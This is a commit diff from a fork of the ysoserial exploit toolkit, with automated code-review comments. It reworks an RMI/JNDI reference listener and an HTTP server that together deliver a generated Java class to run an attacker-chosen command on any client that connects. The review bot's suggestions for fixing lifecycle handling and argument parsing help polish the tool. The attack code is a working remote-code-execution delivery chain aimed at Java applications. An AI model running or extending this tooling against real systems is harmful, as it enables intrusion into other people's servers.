update RMIRefListener2
wh1t3p1g committed Feb 5, 2020
1 parent 25a7abf commit bf95d4a
Showing 2 changed files with 37 additions and 20 deletions.
22 changes: 19 additions & 3 deletions src/main/java/ysoserial/exploit/PayloadHTTPServer.java
@@ -16,7 +16,18 @@
* @author wh1t3P1g
* @since 2020/2/5
*/
public class PayloadHTTPServer {
public class PayloadHTTPServer implements Runnable{

private int port;
private String classname;
private String command;
private HttpServer server;

public PayloadHTTPServer(int port, String classname, String command) {
this.port = port;
this.classname = classname;
this.command = command;
}

public static void main(String[] args) {
if ( args.length < 3 ) {
@@ -29,9 +40,14 @@ public static void main(String[] args) {
String classname = args[1];
String command = args[2];

PayloadHTTPServer server = new PayloadHTTPServer(port, classname, command);
server.run();
}

public void run(){
try {
System.err.println("* Opening Payload HTTPServer on " + port);
HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
server = HttpServer.create(new InetSocketAddress(port), 0);
server.createContext("/"+classname+".class", new PayloadHandler(classname, command));
server.setExecutor(null);
server.start();
@@ -71,7 +87,7 @@ private void generate() throws Exception {

@Override
public void handle(HttpExchange exchange) throws IOException {
System.err.println("Have connection from "+exchange.getRemoteAddress());
System.err.println("Have request from "+exchange.getRemoteAddress());
System.err.println("Get request <"+exchange.getRequestMethod()+"> "+exchange.getRequestURI());
exchange.sendResponseHeaders(200, obj.length);
OutputStream os = exchange.getResponseBody();
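Review bot: `run()` now keeps the `HttpServer` in the new `server` field, but nothing in the visible hunks ever calls `server.stop(...)`, so a caller that embeds this class (as `RMIRefListener2` does in this commit) has no way to shut the listener down once it has started. A small `public void stop() { if (server != null) server.stop(0); }` would give the field a purpose, and `port`, `classname` and `command` can be `final` since they are only set in the constructor. `new InetSocketAddress(port)` also binds the wildcard address, so the generated class is served on every interface of the host; taking an explicit bind address would keep a test run confined to the lab interface. The body of `run()` continues past the end of the hunk, so its exception handling is not visible here.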
35 changes: 18 additions & 17 deletions src/main/java/ysoserial/exploit/RMIRefListener2.java
@@ -9,16 +9,6 @@
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;


/**
* Generic JRMP listener
*
* Opens up an JRMP listener that will deliver the specified payload to any
* client connecting to it and making a call.
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"restriction"
} )
@@ -39,20 +29,31 @@ public RMIRefListener2(int port, String factoryName, String factoryURL, Object p

public static final void main ( final String[] args ) throws Exception{

if ( args.length < 3 ) {
System.err.println(RMIRefListener2.class.getName() + " <port> <factory_name> <factory_url>");
if ( args.length < 4 ) {
System.err.println(RMIRefListener2.class.getName() + "<registryHost:registryPort> <PayloadServerPort> <factory_name> <command>");
System.exit(-1);
return;
}

Reference reference = new Reference(args[ 1 ],args[ 1 ],args[ 2 ]);
String[] registry = args[0].split(":");
int registryPort = Integer.parseInt(registry[1]);
String host = registry[0];

int httpServerPort = Integer.parseInt(args[1]);
String factoryName = args[2];
String factoryURL = "http://"+host+":"+httpServerPort+"/";
String command = args[3];

Reference reference = new Reference(factoryName, factoryName, factoryURL);
final Object payloadObject = new ReferenceWrapper(reference);

try {
int port = Integer.parseInt(args[ 0 ]);
System.err.println("* Opening JRMP listener on " + port);
System.err.println("* URL: rmi://some-host:"+port+"/"+args[1]);
RMIRefListener2 c = new RMIRefListener2(port, args[1], args[2], payloadObject);
PayloadHTTPServer server = new PayloadHTTPServer(httpServerPort, factoryName, command);
server.run();
System.err.println("* Opening JRMP listener on " + registryPort);
System.err.println("* URL: rmi://"+host+":"+registryPort+"/"+factoryName);
System.err.println("* FactoryURL: "+factoryURL);
RMIRefListener c = new RMIRefListener(registryPort, payloadObject);
c.run();
}
catch ( Exception e ) {
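Review bot: The new argument parsing in `main` indexes `registry[1]` and calls `Integer.parseInt` before the `try` block, so a first argument without a `:` or with a non-numeric port leaves `main` as an `ArrayIndexOutOfBoundsException` or `NumberFormatException` stack trace instead of the usage message. Validate the split first, e.g. `String[] registry = args[0].split(":", 2); if (registry.length != 2) { /* print usage and exit */ }`, and move both `parseInt` calls inside the existing `try` so the visible `catch ( Exception e )` handles them. The usage string is also missing a space after the class name (`getName() + "<registryHost:registryPort> ..."`), and the first hunk removes the class Javadoc together with its `@author` line without adding a description of the new four-argument form. The `try` block runs past the end of the hunk.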
